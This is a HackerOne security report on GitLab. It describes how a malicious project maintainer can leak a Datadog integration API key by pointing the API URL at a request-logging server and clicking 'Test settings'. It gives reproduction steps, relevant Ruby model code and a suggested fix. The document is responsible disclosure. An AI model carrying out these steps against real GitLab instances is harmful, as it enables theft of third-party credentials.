Maintainer can leak Datadog API key by changing integration URL
HackerOne report #1724402 by ryotak
on 2022-10-06, assigned to @cmaxim:
Report | Attachments | How To Reproduce
Report
Summary
Due to the incomplete fixes for CVE-2022-2497 and CVE-2022-2882, a malicious maintainer can still leak the API key of Datadog by changing integration URL.
Description
In the patch for CVE-2022-2882, some fields of Github
integration model was modified, and exposes_secrets: true
was added to repository_url
field.
This option enables resetting of secrets once the field is updated, which makes exfiltrating of access tokens impossible.
ee/app/models/integrations/github.rb
line 22-26
field :repository_url,
title: -> { s_('GithubIntegration|Repository URL') },
required: true,
exposes_secrets: true,
placeholder: 'https://github.com/owner/repository'
However, there are some models that are missing exposes_secrets
option.
While most of these models are using their own method to reset the secrets (e.g. before_validation :reset_passwowrd
), there is one exception: Datadog
app/models/integrations/jenkins.rb
line 30-44
before_validation :reset_password
[...]
def reset_password
# don't reset the password if a new one is provided
if (jenkins_url_changed? || username.blank?) && !password_touched?
self.password = nil
end
end
In Datadog model, there are no validations for exposing the secrets, which allows a malicious maintainer to leak API keys by changing integration URL.
app/models/integrations/datadog.rb
line 25
validates :api_url, public_url: { allow_blank: true }
Steps to reproduce
(These steps to reproduce assumes that you're using gitlab.com. If you're using a self-hosted instance, you may need to prepare a GitLab runner.)
- Prepare 2 GitLab accounts. (Called
account A
andaccount B
below) - Create a project with account A and upload to the repository.
- In
Settings -> Integrations -> Datadog
, enable a Datadog integration and enter a new API key. (This API key can be a random string) - In
Project information -> Members
, invite account B with theMaintainer
permission. - Login to account B, and open a project created in step 2.
- In
Settings -> Integrations -> Datadog
, fill theAPI URL
to a server that you can read the request log. (I'd recommend https://requestbin.com/ if you need a server.) - Click
Test settings
. - Confirm the API key of Datadog is sent to the server.
If you have any troubles with these steps to reproduce, please check the video attached to this report.
Examples
Example repository that demonstrated the vulnerability: https://gitlab.com/Ry0taK/maintainer-integration-leak
As this repository is private, please let me know if you need to access this repository.
What is the current bug behavior?
Access tokens for Datadog integration are keep remaining even after changing the API URLs.
What is the expected correct behavior?
Access tokens for Datadog integration should be cleared once API URLs are changed.
Suggested fix
Add exposes_secrets: true
to api_url
of Datadog integration model.
Relevant logs and/or screenshots
Output of checks
Results of GitLab environment info
System information
System: Ubuntu 20.04
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version:6.4.2
Go Version: unknown
GitLab information
Version: 15.4.1-ee
Revision: 7b2ed8f038f
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: https://gl.ryotak.me
HTTP Clone URL: https://gl.ryotak.me/some-group/some-project.git
SSH Clone URL: git@gl.ryotak.me:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.10.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Impact
A malicious maintainer can leak Datadog API key, and modify/exfiltrate information on Datadog.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: